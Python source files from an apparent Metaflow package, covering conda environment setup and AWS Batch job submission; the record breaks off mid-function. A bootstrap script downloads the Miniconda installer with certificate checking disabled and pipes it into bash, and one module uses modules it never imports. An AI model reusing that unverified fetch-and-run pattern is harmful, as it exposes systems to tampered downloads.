from metaflow.environment import MetaflowEnvironment
from metaflow.exception import MetaflowException
from .conda import Conda
from . import get_conda_manifest_path, CONDA_MAGIC_FILE
class CondaEnvironment(MetaflowEnvironment):
TYPE = 'conda'
_filecache = None
def __init__(self, flow):
self.flow = flow
self.local_root = None
def init_environment(self, logger):
# Print a message for now
logger("Bootstrapping conda environment...(this could take a few minutes)")
def decospecs(self):
# Apply conda decorator to all steps
return ('conda', )
def _get_conda_decorator(self, step_name):
step = next(step for step in self.flow if step.name == step_name)
decorator = next(deco for deco in step.decorators if deco.name == 'conda')
# Guaranteed to have a conda decorator because of self.decospecs()
return decorator
def _get_env_id(self, step_name):
conda_decorator = self._get_conda_decorator(step_name)
if conda_decorator.is_enabled():
return conda_decorator._env_id()
return None
def _get_executable(self, step_name):
env_id = self._get_env_id(step_name)
if env_id is not None:
return (os.path.join(env_id, "bin/python -s"))
return None
def set_local_root(self, ds_root):
self.local_root = ds_root
def bootstrap_commands(self, step_name):
# Bootstrap conda and execution environment for step
env_id = self._get_env_id(step_name)
if env_id is not None:
return [
"echo \'Bootstrapping environment.\'",
"python -m metaflow.plugins.conda.batch_bootstrap \"%s\" %s" % \
(self.flow.name, env_id),
"echo \'Environment bootstrapped.\'"
]
return []
def add_to_package(self):
# Add conda manifest file to job package at the top level.
path = get_conda_manifest_path(self.local_root, self.flow.name)
if os.path.exists(path):
return [(path, os.path.basename(path))]
else:
return []
def pylint_config(self):
# Disable (import-error) in pylint
return ["--disable=F0401"]
def executable(self, step_name):
# Get relevant python interpreter for step
executable = self._get_executable(step_name)
if executable is not None:
return executable
return super(CondaEnvironment, self).executable(step_name)
@classmethod
def get_client_info(cls, flow_name, metadata):
if cls._filecache is None:
from metaflow.client.filecache import FileCache
cls._filecache = FileCache()
info = metadata.get('code-package')
env_id = metadata.get('conda_env_id')
if info is None or env_id is None:
return {'type': 'conda'}
info = json.loads(info)
with cls._filecache.get_data(info['ds_type'], flow_name, info['sha']) as f:
tar = tarfile.TarFile(fileobj=f)
conda_file = tar.extractfile(CONDA_MAGIC_FILE)
if conda_file is None:
return {'type': 'conda'}
info = json.loads(conda_file.read().decode('utf-8'))
new_info = {
'type': 'conda',
'explicit': info[env_id]['explicit'],
'deps': info[env_id]['deps']}
return new_info | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/conda/conda_environment.py | conda_environment.py |
import errno
import os
import json
import subprocess
import time
from distutils.version import LooseVersion
from metaflow.exception import MetaflowException
from metaflow.environment import InvalidEnvironmentException
from metaflow.util import which
class CondaException(MetaflowException):
headline = 'Conda ran into an error while setting up environment.'
def __init__(self, error):
if isinstance(error, (list,)):
error = '\n'.join(error)
msg = '{error}'.format(error=error)
super(CondaException, self).__init__(msg)
class CondaStepException(CondaException):
def __init__(self, exception, step):
msg = 'Step: {step}, Error: {error}'.format(step=step, error=exception.message)
super(CondaStepException, self).__init__(msg)
class Conda(object):
def __init__(self):
self._bin = which('conda')
if self._bin is None:
raise InvalidEnvironmentException('No conda installation found. '
'Install conda first.')
if LooseVersion(self._info()['conda_version']) < LooseVersion('4.6.0'):
raise InvalidEnvironmentException('Conda version 4.6.0 or newer '
'is required. Visit '
'https://docs.conda.io/en/latest/miniconda.html '
'for installation instructions.')
if 'conda-forge' not in self.config()['channels']:
raise InvalidEnvironmentException('Conda channel \'conda-forge\' '
'is required. Specify it with CONDA_CHANNELS '
'environment variable.')
def create(self, step_name, env_id, deps, architecture=None, explicit=False):
# Create the conda environment
try:
with CondaLock(self._env_lock_file(env_id)):
self._remove(env_id)
self._create(env_id, deps, explicit, architecture)
return self._deps(env_id)
except CondaException as e:
raise CondaStepException(e, step_name)
def remove(self, step_name, env_id):
# Remove the conda environment
try:
with CondaLock(self._env_lock_file(env_id)):
self._remove(env_id)
except CondaException as e:
raise CondaStepException(e, step_name)
def python(self, env_id):
# Get Python interpreter for the conda environment
return os.path.join(self._env_path(env_id), 'bin/python')
def environments(self, flow):
# List all conda environments associated with the flow
envs = self._info()['envs']
ret = {}
for env in envs:
if '/envs/' in env:
name = os.path.basename(env)
if name.startswith('metaflow_%s' % flow):
ret[name] = env
return ret
def config(self):
# Show conda installation configuration
return json.loads(self._call_conda(['config', '--show']))
def package_info(self, env_id):
# Show conda environment package configuration
# Not every parameter is exposed via conda cli hence this ignominy
metadata = os.path.join(self._env_path(env_id), 'conda-meta')
for path, dirs, files in os.walk(metadata):
for file in files:
if file.endswith('.json'):
with open(os.path.join(path, file)) as f:
yield json.loads(f.read())
def _info(self):
return json.loads(self._call_conda(['info']))
def _create(self, env_id, deps, explicit=False, architecture=None):
cmd = ['create', '--yes', '--no-default-packages',
'--name', env_id, '--quiet']
if explicit:
cmd.append('--no-deps')
cmd.extend(deps)
self._call_conda(cmd, architecture)
def _remove(self, env_id):
self._call_conda(['env', 'remove', '--name',
env_id, '--yes', '--quiet'])
def _install(self, env_id, deps, explicit=False):
cmd = ['install', '--yes', '--name', env_id, '--quiet']
if explicit:
cmd.append('--no-deps')
cmd.extend(deps)
self._call_conda(cmd)
def _install_order(self, env_id):
cmd = ['list', '--name', env_id, '--explicit']
response = self._call_conda(cmd).decode('utf-8')
emit = False
result = []
for line in response.splitlines():
if emit:
result.append(line.split('/')[-1])
if not emit and line == '@EXPLICIT':
emit = True
return result
def _deps(self, env_id):
exact_deps = []
urls = []
for package in self.package_info(env_id):
exact_deps.append('%s=%s=%s' % (package['name'], package['version'], package['build']))
urls.append(package['url'])
order = self._install_order(env_id)
return (exact_deps, urls, order)
def _env_path(self, env_id):
envs = self._info()['envs']
for env in envs:
if '/envs/' in env:
name = os.path.basename(env)
if name == env_id:
return env
return None
def _env_lock_file(self, env_id):
return os.path.join(self._info()['conda_prefix'], 'mf_env-creation.lock')
def _call_conda(self, args, architecture=None):
try:
return subprocess.check_output(
[self._bin] + args,
stderr = open(os.devnull, 'wb'),
env = dict(
os.environ,
**{
'CONDA_JSON': 'True',
'CONDA_SUBDIR': (architecture if architecture else ''),
'CONDA_USE_ONLY_TAR_BZ2': 'True'
})
).strip()
except subprocess.CalledProcessError as e:
try:
output = json.loads(e.output)
err = [output['error']]
for error in output.get('errors', []):
err.append(error['error'])
raise CondaException(err)
except (TypeError, ValueError) as ve:
pass
raise RuntimeError(
'command \'{cmd}\' returned error ({code}): {output}'
.format(cmd=e.cmd, code=e.returncode, output=e.output))
class CondaLock(object):
def __init__(self, lock, timeout=3600, delay=10):
self.lock = lock
self.locked = False
self.timeout = timeout
self.delay = delay
def _acquire(self):
start = time.time()
try:
os.makedirs(os.path.dirname(self.lock))
except OSError as x:
if x.errno != errno.EEXIST:
raise
while True:
try:
self.fd = os.open(self.lock, os.O_CREAT |
os.O_EXCL | os.O_RDWR)
self.locked = True
break
except OSError as e:
if e.errno != errno.EEXIST:
raise
if self.timeout is None:
raise CondaException(
'Could not acquire lock {}'.format(self.lock))
if (time.time() - start) >= self.timeout:
raise CondaException(
'Timeout occured while acquiring lock {}'.format(self.lock))
time.sleep(self.delay)
def _release(self):
if self.locked:
os.close(self.fd)
os.unlink(self.lock)
self.locked = False
def __enter__(self):
if not self.locked:
self._acquire()
return self
def __exit__(self, type, value, traceback):
self.__del__()
def __del__(self):
self._release() | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/conda/conda.py | conda.py |
import collections
import os
import sys
from hashlib import sha1
from multiprocessing.dummy import Pool
import platform
import requests
import shutil
import tempfile
try:
from urlparse import urlparse
except:
from urllib.parse import urlparse
from metaflow.datastore.local import LocalDataStore
from metaflow.decorators import StepDecorator
from metaflow.environment import InvalidEnvironmentException
from metaflow.metadata import MetaDatum
from metaflow.metaflow_config import get_pinned_conda_libs, CONDA_PACKAGE_S3ROOT
from metaflow.util import get_metaflow_root
from metaflow.datatools import S3
from . import read_conda_manifest, write_to_conda_manifest
from .conda import Conda
class CondaStepDecorator(StepDecorator):
"""
Conda decorator that sets the Conda environment for your step
To use, add this decorator to your step:
```
@conda
@step
def MyStep(self):
...
```
Information in this decorator will override any eventual @conda_base flow level decorator.
Parameters
----------
libraries : Dict
Libraries to use for this flow. The key is the name of the package and the value
is the version to use. Defaults to {}
python : string
Version of Python to use (for example: '3.7.4'). Defaults to None
(will use the current python version)
disabled : bool
If set to True, disables Conda. Defaults to False
"""
name = 'conda'
defaults = {'libraries': {},
'python': None,
'disabled': None}
conda = None
environments = None
def _get_base_attributes(self):
if 'conda_base' in self.flow._flow_decorators:
return self.flow._flow_decorators['conda_base'].attributes
return self.defaults
def _python_version(self):
return next(x for x in [
self.attributes['python'],
self.base_attributes['python'],
platform.python_version()] if x is not None)
def is_enabled(self):
return not next(x for x in [
self.attributes['disabled'],
self.base_attributes['disabled'],
False] if x is not None)
def _lib_deps(self):
deps = get_pinned_conda_libs()
base_deps = self.base_attributes['libraries']
deps.update(base_deps)
step_deps = self.attributes['libraries']
if isinstance(step_deps, collections.Mapping):
deps.update(step_deps)
return deps
def _step_deps(self):
deps = [b'python==%s' % self._python_version().encode()]
deps.extend(b'%s==%s' % (name.encode('ascii'), ver.encode('ascii'))
for name, ver in self._lib_deps().items())
return deps
def _env_id(self):
deps = self._step_deps()
return 'metaflow_%s_%s_%s' % (self.flow.name,
self.architecture,
sha1(b' '.join(sorted(deps))).hexdigest())
def _resolve_step_environment(self, ds_root, force=False):
env_id = self._env_id()
cached_deps = read_conda_manifest(ds_root, self.flow.name)
if CondaStepDecorator.conda is None:
CondaStepDecorator.conda = Conda()
CondaStepDecorator.environments = CondaStepDecorator.conda.environments(self.flow.name)
if force or env_id not in cached_deps or 'cache_urls' not in cached_deps[env_id]:
if force or env_id not in cached_deps:
deps = self._step_deps()
(exact_deps, urls, order) = \
self.conda.create(self.step, env_id, deps, architecture=self.architecture)
payload = {
'explicit': exact_deps,
'deps': [d.decode('ascii') for d in deps],
'urls': urls,
'order': order
}
else:
payload = cached_deps[env_id]
if self.datastore.TYPE == 's3' and 'cache_urls' not in payload:
payload['cache_urls'] = self._cache_env()
write_to_conda_manifest(ds_root, self.flow.name, env_id, payload)
CondaStepDecorator.environments = CondaStepDecorator.conda.environments(self.flow.name)
return env_id
def _cache_env(self):
def _download(entry):
url, local_path = entry
with requests.get(url, stream=True) as r:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
env_id = self._env_id()
files = []
to_download = []
for package_info in self.conda.package_info(env_id):
url = urlparse(package_info['url'])
path = os.path.join(CONDA_PACKAGE_S3ROOT,
url.netloc,
url.path.lstrip('/'),
package_info['md5'],
package_info['fn'])
#The tarball maybe missing when user invokes `conda clean`!
tarball_path = package_info['package_tarball_full_path']
if os.path.isdir(package_info['package_tarball_full_path']):
tarball_path = '%s.tar.bz2' % package_info['package_tarball_full_path']
to_download.append((package_info['url'], tarball_path))
files.append((path, tarball_path))
if to_download:
Pool(8).map(_download, to_download)
with S3() as s3:
s3.put_files(files, overwrite=False)
return [files[0] for files in files]
def _prepare_step_environment(self, step_name, ds_root):
env_id = self._resolve_step_environment(ds_root)
if env_id not in CondaStepDecorator.environments:
cached_deps = read_conda_manifest(ds_root, self.flow.name)
self.conda.create(self.step,
env_id,
cached_deps[env_id]['urls'],
architecture=self.architecture,
explicit=True)
CondaStepDecorator.environments = CondaStepDecorator.conda.environments(self.flow.name)
return env_id
def _architecture(self, decos):
for deco in decos:
if deco.name == 'batch':
# force conda resolution for linux-64 architectures
return 'linux-64'
bit = '32'
if platform.machine().endswith('64'):
bit = '64'
if platform.system() == 'Linux':
return 'linux-%s' % bit
elif platform.system() == 'Darwin':
return 'osx-%s' % bit
else:
raise InvalidEnvironmentException('The *@conda* decorator is not supported '
'outside of Linux and Darwin platforms')
def runtime_init(self, flow, graph, package, run_id):
# Create a symlink to installed version of metaflow to execute user code against
path_to_metaflow = os.path.join(get_metaflow_root(), 'metaflow')
self.metaflow_home = tempfile.mkdtemp(dir='/tmp')
os.symlink(path_to_metaflow, os.path.join(self.metaflow_home, 'metaflow'))
def step_init(self, flow, graph, step, decos, environment, datastore, logger):
if environment.TYPE != 'conda':
raise InvalidEnvironmentException('The *@conda* decorator requires '
'--environment=conda')
def _logger(line, **kwargs):
logger(line)
self.local_root = LocalDataStore.get_datastore_root_from_config(_logger)
environment.set_local_root(self.local_root)
self.architecture = self._architecture(decos)
self.step = step
self.flow = flow
self.datastore = datastore
self.base_attributes = self._get_base_attributes()
def package_init(self, flow, step, environment):
if self.is_enabled():
self._prepare_step_environment(step, self.local_root)
def runtime_task_created(self, datastore, task_id, split_index, input_paths, is_cloned):
if self.is_enabled():
self.env_id = self._prepare_step_environment(self.step, self.local_root)
def task_pre_step(
self, step_name, ds, meta, run_id, task_id, flow, graph, retry_count, max_retries):
meta.register_metadata(run_id, step_name, task_id,
[MetaDatum(field='conda_env_id',
value=self._env_id(),
type='conda_env_id')])
def runtime_step_cli(self, cli_args, retry_count, max_user_code_retries):
if self.is_enabled() and 'batch' not in cli_args.commands:
python_path = self.metaflow_home
if os.environ.get('PYTHONPATH') is not None:
python_path = os.pathsep.join([os.environ['PYTHONPATH'], python_path])
cli_args.env['PYTHONPATH'] = python_path
cli_args.env['_METAFLOW_CONDA_ENV'] = self.env_id
cli_args.entrypoint[0] = self.conda.python(self.env_id)
def runtime_finished(self, exception):
shutil.rmtree(self.metaflow_home) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/conda/conda_step_decorator.py | conda_step_decorator.py |
import functools
import json
from multiprocessing import Pool
import os
import tarfile
import shutil
import subprocess
import sys
from metaflow.datatools import S3
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR
from . import CONDA_MAGIC_FILE
def bootstrap_environment(flow_name, env_id):
setup_conda_manifest(flow_name)
packages = download_conda_packages(flow_name, env_id)
install_conda_environment(env_id, packages)
def setup_conda_manifest(flow_name):
manifest_folder = os.path.join(os.getcwd(), DATASTORE_LOCAL_DIR, flow_name)
if not os.path.exists(manifest_folder):
os.makedirs(manifest_folder)
shutil.move(os.path.join(os.getcwd(), CONDA_MAGIC_FILE),
os.path.join(manifest_folder, CONDA_MAGIC_FILE))
def download_conda_packages(flow_name, env_id):
pkgs_folder = os.path.join(os.getcwd(), 'pkgs')
if not os.path.exists(pkgs_folder):
os.makedirs(pkgs_folder)
manifest_folder = os.path.join(os.getcwd(), DATASTORE_LOCAL_DIR, flow_name)
with open(os.path.join(manifest_folder, CONDA_MAGIC_FILE)) as f:
env = json.load(f)[env_id]
with S3() as s3:
for pkg in s3.get_many(env['cache_urls']):
shutil.move(pkg.path, os.path.join(pkgs_folder, os.path.basename(pkg.key)))
return env['order']
def install_conda_environment(env_id, packages):
args = [
'if ! type conda >/dev/null 2>&1; \
then wget --no-check-certificate https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh >/dev/null 2>&1; \
bash ~/miniconda.sh -b -p {0} >/dev/null 2>&1; \
export PATH=$PATH:{0}/bin; fi'.format(os.path.join(os.getcwd(), 'conda')),
'cd {0}'.format(os.path.join(os.getcwd(), 'pkgs')),
'conda create --yes --no-default-packages -p {0} --no-deps {1} >/dev/null 2>&1'.format(os.path.join(os.getcwd(), env_id), ' '.join(packages)),
'cd {0}'.format(os.getcwd())
]
os.system(' && '.join(args))
if __name__ == '__main__':
bootstrap_environment(sys.argv[1], sys.argv[2]) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/conda/batch_bootstrap.py | batch_bootstrap.py |
import os
import time
import json
import select
import atexit
import shlex
import time
import warnings
from requests.exceptions import HTTPError
from metaflow.exception import MetaflowException, MetaflowInternalError
from metaflow.metaflow_config import BATCH_METADATA_SERVICE_URL, DATATOOLS_S3ROOT, \
DATASTORE_LOCAL_DIR, DATASTORE_SYSROOT_S3, DEFAULT_METADATA, METADATA_SERVICE_HEADERS
from metaflow import util
from .batch_client import BatchClient
class BatchException(MetaflowException):
headline = 'Batch error'
class BatchKilledException(MetaflowException):
headline = 'Batch task killed'
class Batch(object):
def __init__(self, metadata, environment):
self.metadata = metadata
self.environment = environment
self._client = BatchClient()
atexit.register(lambda : self.job.kill() if hasattr(self, 'job') else None)
def _command(self, code_package_url, environment, step_name, step_cli):
cmds = environment.get_package_commands(code_package_url)
cmds.extend(environment.bootstrap_commands(step_name))
cmds.append("echo 'Task is starting.'")
cmds.extend(step_cli)
return shlex.split('/bin/sh -c "%s"' % " && ".join(cmds))
def _search_jobs(self, flow_name, run_id, user):
if user is None:
regex = '-{flow_name}-{run_id}-'.format(flow_name=flow_name, run_id=run_id)
else:
regex = '{user}-{flow_name}-{run_id}-'.format(
user=user, flow_name=flow_name, run_id=run_id
)
jobs = []
for job in self._client.unfinished_jobs():
if regex in job['jobName']:
jobs.append(job)
return jobs
def _job_name(self, user, flow_name, run_id, step_name, task_id, retry_count):
return '{user}-{flow_name}-{run_id}-{step_name}-{task_id}-{retry_count}'.format(
user=user,
flow_name=flow_name,
run_id=run_id,
step_name=step_name,
task_id=task_id,
retry_count=retry_count,
)
def list_jobs(self, flow_name, run_id, user, echo):
jobs = self._search_jobs(flow_name, run_id, user)
if jobs:
for job in jobs:
echo(
'{name} [{id}] ({status})'.format(
name=job['jobName'], id=job['jobId'], status=job['status']
)
)
else:
echo('No running Batch jobs found.')
def kill_jobs(self, flow_name, run_id, user, echo):
jobs = self._search_jobs(flow_name, run_id, user)
if jobs:
for job in jobs:
try:
self._client.attach_job(job['jobId']).kill()
echo(
'Killing Batch job: {name} [{id}] ({status})'.format(
name=job['jobName'], id=job['jobId'], status=job['status']
)
)
except Exception as e:
echo(
'Failed to terminate Batch job %s [%s]'
% (job['jobId'], repr(e))
)
else:
echo('No running Batch jobs found.')
def launch_job(
self,
step_name,
step_cli,
code_package_sha,
code_package_url,
code_package_ds,
image,
queue,
iam_role=None,
cpu=None,
gpu=None,
memory=None,
run_time_limit=None,
env={},
attrs={},
):
job_name = self._job_name(
attrs['metaflow.user'],
attrs['metaflow.flow_name'],
attrs['metaflow.run_id'],
attrs['metaflow.step_name'],
attrs['metaflow.task_id'],
attrs['metaflow.retry_count'],
)
if queue is None:
queue = next(self._client.active_job_queues(), None)
if queue is None:
raise BatchException(
'Unable to launch Batch job. No job queue '
' specified and no valid & enabled queue found.'
)
job = self._client.job()
job \
.job_name(job_name) \
.job_queue(queue) \
.command(
self._command(code_package_url,
self.environment, step_name, [step_cli])) \
.image(image) \
.iam_role(iam_role) \
.cpu(cpu) \
.gpu(gpu) \
.memory(memory) \
.timeout_in_secs(run_time_limit) \
.environment_variable('METAFLOW_CODE_SHA', code_package_sha) \
.environment_variable('METAFLOW_CODE_URL', code_package_url) \
.environment_variable('METAFLOW_CODE_DS', code_package_ds) \
.environment_variable('METAFLOW_USER', attrs['metaflow.user']) \
.environment_variable('METAFLOW_SERVICE_URL', BATCH_METADATA_SERVICE_URL) \
.environment_variable('METAFLOW_SERVICE_HEADERS', json.dumps(METADATA_SERVICE_HEADERS)) \
.environment_variable('METAFLOW_DATASTORE_SYSROOT_LOCAL', DATASTORE_LOCAL_DIR) \
.environment_variable('METAFLOW_DATASTORE_SYSROOT_S3', DATASTORE_SYSROOT_S3) \
.environment_variable('METAFLOW_DATATOOLS_S3ROOT', DATATOOLS_S3ROOT) \
.environment_variable('METAFLOW_DEFAULT_DATASTORE', 's3') \
.environment_variable('METAFLOW_DEFAULT_METADATA', DEFAULT_METADATA)
for name, value in env.items():
job.environment_variable(name, value)
for name, value in self.metadata.get_runtime_environment('batch').items():
job.environment_variable(name, value)
if attrs:
for key, value in attrs.items():
job.parameter(key, value)
self.job = job.execute()
def wait(self, echo=None):
def wait_for_launch(job):
status = job.status
echo(job.id, 'Task is starting (status %s)...' % status)
t = time.time()
while True:
if status != job.status or (time.time()-t) > 30:
status = job.status
echo(
self.job.id,
'Task is starting (status %s)...' % status
)
t = time.time()
if self.job.is_running or self.job.is_done or self.job.is_crashed:
break
select.poll().poll(200)
def print_all(tail):
for line in tail:
if line:
echo(self.job.id, util.to_unicode(line))
else:
return tail, False
return tail, True
wait_for_launch(self.job)
logs = self.job.logs()
while True:
logs, finished, = print_all(logs)
if finished:
break
else:
select.poll().poll(500)
if self.job.is_crashed:
if self.job.reason:
raise BatchException(
'Task crashed due to %s .'
'This could be a transient error. '
'Use @retry to retry.' % self.job.reason
)
raise BatchException(
'Task crashed. '
'This could be a transient error. '
'Use @retry to retry.'
)
else:
if self.job.is_running:
# Kill the job if it is still running by throwing an exception.
raise BatchException("Task failed!")
echo(
self.job.id,
'Task finished with exit code %s.' % self.job.status_code
) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/aws/batch/batch.py | batch.py |
import os
import sys
import tarfile
import time
import traceback
import click
from distutils.dir_util import copy_tree
from .batch import Batch, BatchKilledException
from metaflow.datastore import MetaflowDataStore
from metaflow.datastore.local import LocalDataStore
from metaflow.datastore.util.s3util import get_s3_client
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR
from metaflow import util
from metaflow.exception import (
CommandException,
METAFLOW_EXIT_DISALLOW_RETRY,
)
try:
# python2
from urlparse import urlparse
except: # noqa E722
# python3
from urllib.parse import urlparse
@click.group()
def cli():
pass
@cli.group(help="Commands related to Batch.")
def batch():
pass
def _execute_cmd(func, flow_name, run_id, user, my_runs, echo):
if user and my_runs:
raise CommandException("--user and --my-runs are mutually exclusive")
if run_id and my_runs:
raise CommandException("--run_id and --my-runs are mutually exclusive")
if my_runs:
user = util.get_username()
latest_run = False
if user and not run_id:
latest_run = True
if not run_id and latest_run:
run_id = util.get_latest_run_id(echo, flow_name)
if run_id is None:
raise CommandException("A previous run id was not found. Specify --run-id.")
func(flow_name, run_id, user, echo)
def _sync_metadata(echo, metadata, datastore_root, attempt):
if metadata.TYPE == 'local':
def echo_none(*args, **kwargs):
pass
path = os.path.join(
datastore_root,
MetaflowDataStore.filename_with_attempt_prefix('metadata.tgz', attempt))
url = urlparse(path)
bucket = url.netloc
key = url.path.lstrip('/')
s3, err = get_s3_client()
try:
s3.head_object(Bucket=bucket, Key=key)
# If we are here, we can download the object
with util.TempDir() as td:
tar_file_path = os.path.join(td, 'metadata.tgz')
with open(tar_file_path, 'wb') as f:
s3.download_fileobj(bucket, key, f)
with tarfile.open(tar_file_path, 'r:gz') as tar:
tar.extractall(td)
copy_tree(
os.path.join(td, DATASTORE_LOCAL_DIR),
LocalDataStore.get_datastore_root_from_config(echo_none),
update=True)
except err as e: # noqa F841
pass
@batch.command(help="List running Batch tasks of this flow")
@click.option(
"--my-runs", default=False, is_flag=True, help="Run the command over all tasks."
)
@click.option("--user", default=None, help="List tasks for the given user.")
@click.option("--run-id", default=None, help="List tasks corresponding to the run id.")
@click.pass_context
def list(ctx, run_id, user, my_runs):
batch = Batch(ctx.obj.metadata, ctx.obj.environment)
_execute_cmd(
batch.list_jobs, ctx.obj.flow.name, run_id, user, my_runs, ctx.obj.echo
)
@batch.command(help="Terminate running Batch tasks of this flow.")
@click.option("--my-runs", default=False, is_flag=True, help="Kill all running tasks.")
@click.option("--user", default=None, help="List tasks for the given user.")
@click.option(
"--run-id", default=None, help="Terminate tasks corresponding to the run id."
)
@click.pass_context
def kill(ctx, run_id, user, my_runs):
batch = Batch(ctx.obj.metadata, ctx.obj.environment)
_execute_cmd(
batch.kill_jobs, ctx.obj.flow.name, run_id, user, my_runs, ctx.obj.echo
)
@batch.command(
help="Execute a single task using Batch. This command "
"calls the top-level step command inside a Batch "
"job with the given options. Typically you do not "
"call this command directly; it is used internally "
"by Metaflow."
)
@click.argument("step-name")
@click.argument("code-package-sha")
@click.argument("code-package-url")
@click.option("--executable", help="Executable requirement for Batch.")
@click.option(
"--image", help="Docker image requirement for Batch. In name:version format."
)
@click.option(
"--iam_role", help="IAM role requirement for Batch"
)
@click.option("--cpu", help="CPU requirement for Batch.")
@click.option("--gpu", help="GPU requirement for Batch.")
@click.option("--memory", help="Memory requirement for Batch.")
@click.option("--queue", help="Job execution queue for Batch.")
@click.option("--run-id", help="Passed to the top-level 'step'.")
@click.option("--task-id", help="Passed to the top-level 'step'.")
@click.option("--input-paths", help="Passed to the top-level 'step'.")
@click.option("--split-index", help="Passed to the top-level 'step'.")
@click.option("--clone-path", help="Passed to the top-level 'step'.")
@click.option("--clone-run-id", help="Passed to the top-level 'step'.")
@click.option(
"--tag", multiple=True, default=None, help="Passed to the top-level 'step'."
)
@click.option("--namespace", default=None, help="Passed to the top-level 'step'.")
@click.option("--retry-count", default=0, help="Passed to the top-level 'step'.")
@click.option(
"--max-user-code-retries", default=0, help="Passed to the top-level 'step'."
)
@click.option(
"--run-time-limit",
default=5 * 24 * 60 * 60,
help="Run time limit in seconds for the Batch job. " "Default is 5 days.",
)
@click.pass_context
def step(
ctx,
step_name,
code_package_sha,
code_package_url,
executable=None,
image=None,
iam_role=None,
cpu=None,
gpu=None,
memory=None,
queue=None,
run_time_limit=None,
**kwargs
):
def echo(batch_id, msg, stream=sys.stdout):
ctx.obj.echo_always("[%s] %s" % (batch_id, msg))
if ctx.obj.datastore.datastore_root is None:
ctx.obj.datastore.datastore_root = ctx.obj.datastore.get_datastore_root_from_config(echo)
if executable is None:
executable = ctx.obj.environment.executable(step_name)
entrypoint = "%s -u %s" % (executable, os.path.basename(sys.argv[0]))
top_args = " ".join(util.dict_to_cli_options(ctx.parent.parent.params))
input_paths = kwargs.get("input_paths")
split_vars = None
if input_paths:
max_size = 30 * 1024
split_vars = {
"METAFLOW_INPUT_PATHS_%d" % (i // max_size): input_paths[i : i + max_size]
for i in range(0, len(input_paths), max_size)
}
kwargs["input_paths"] = "".join("${%s}" % s for s in split_vars.keys())
step_args = " ".join(util.dict_to_cli_options(kwargs))
step_cli = u"{entrypoint} {top_args} step {step} {step_args}".format(
entrypoint=entrypoint, top_args=top_args, step=step_name, step_args=step_args
)
node = ctx.obj.graph[step_name]
# Get retry information
retry_count = kwargs.get("retry_count", 0)
retry_deco = [deco for deco in node.decorators if deco.name == "retry"]
minutes_between_retries = None
if retry_deco:
minutes_between_retries = int(
retry_deco[0].attributes.get("minutes_between_retries", 1)
)
# Set batch attributes
attrs = {
"metaflow.user": util.get_username(),
"metaflow.flow_name": ctx.obj.flow.name,
"metaflow.step_name": step_name,
"metaflow.run_id": kwargs["run_id"],
"metaflow.task_id": kwargs["task_id"],
"metaflow.retry_count": str(retry_count),
"metaflow.version": ctx.obj.environment.get_environment_info()[
"metaflow_version"
],
}
env_deco = [deco for deco in node.decorators if deco.name == "environment"]
if env_deco:
env = env_deco[0].attributes["vars"]
else:
env = {}
datastore_root = os.path.join(ctx.obj.datastore.make_path(
ctx.obj.flow.name, kwargs['run_id'], step_name, kwargs['task_id']))
# Add the environment variables related to the input-paths argument
if split_vars:
env.update(split_vars)
if retry_count:
ctx.obj.echo_always(
"Sleeping %d minutes before the next Batch retry" % minutes_between_retries
)
time.sleep(minutes_between_retries * 60)
batch = Batch(ctx.obj.metadata, ctx.obj.environment)
try:
with ctx.obj.monitor.measure("metaflow.batch.launch"):
batch.launch_job(
step_name,
step_cli,
code_package_sha,
code_package_url,
ctx.obj.datastore.TYPE,
image=image,
queue=queue,
iam_role=iam_role,
cpu=cpu,
gpu=gpu,
memory=memory,
run_time_limit=run_time_limit,
env=env,
attrs=attrs,
)
except Exception as e:
print(e)
_sync_metadata(echo, ctx.obj.metadata, datastore_root, retry_count)
sys.exit(METAFLOW_EXIT_DISALLOW_RETRY)
try:
batch.wait(echo=echo)
except BatchKilledException:
# don't retry killed tasks
traceback.print_exc()
_sync_metadata(echo, ctx.obj.metadata, datastore_root, retry_count)
sys.exit(METAFLOW_EXIT_DISALLOW_RETRY)
_sync_metadata(echo, ctx.obj.metadata, datastore_root, retry_count) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/aws/batch/batch_cli.py | batch_cli.py |
from collections import defaultdict, deque
import select
import sys
import time
import hashlib
try:
unicode
except NameError:
unicode = str
basestring = str
from metaflow.exception import MetaflowException
from metaflow.metaflow_config import get_authenticated_boto3_client
class BatchClient(object):
def __init__(self):
self._client = get_authenticated_boto3_client('batch')
def active_job_queues(self):
paginator = self._client.get_paginator('describe_job_queues')
return (
queue['jobQueueName']
for page in paginator.paginate()
for queue in page['jobQueues']
if queue['state'] == 'ENABLED' and queue['status'] == 'VALID'
)
def unfinished_jobs(self):
queues = self.active_job_queues()
return (
job
for queue in queues
for status in ['SUBMITTED', 'PENDING', 'RUNNABLE', 'STARTING', 'RUNNING']
for page in self._client.get_paginator('list_jobs').paginate(
jobQueue=queue, jobStatus=status
)
for job in page['jobSummaryList']
)
def job(self):
return BatchJob(self._client)
def attach_job(self, job_id):
job = RunningJob(job_id, self._client)
return job.update()
class BatchJobException(MetaflowException):
headline = 'Batch job error'
class BatchJob(object):
def __init__(self, client):
self._client = client
tree = lambda: defaultdict(tree)
self.payload = tree()
def execute(self):
if self._image is None:
raise BatchJobException(
'Unable to launch Batch job. No docker image specified.'
)
if self._iam_role is None:
raise BatchJobException(
'Unable to launch Batch job. No IAM role specified.'
)
self.payload['jobDefinition'] = self._job_def_arn(self._image, self._iam_role)
response = self._client.submit_job(**self.payload)
job = RunningJob(response['jobId'], self._client)
return job.update()
def _job_def_arn(self, image, job_role):
def_name = 'metaflow_%s' % hashlib.sha224((image + job_role).encode('utf-8')).hexdigest()
payload = {'jobDefinitionName': def_name, 'status': 'ACTIVE'}
response = self._client.describe_job_definitions(**payload)
if len(response['jobDefinitions']) > 0:
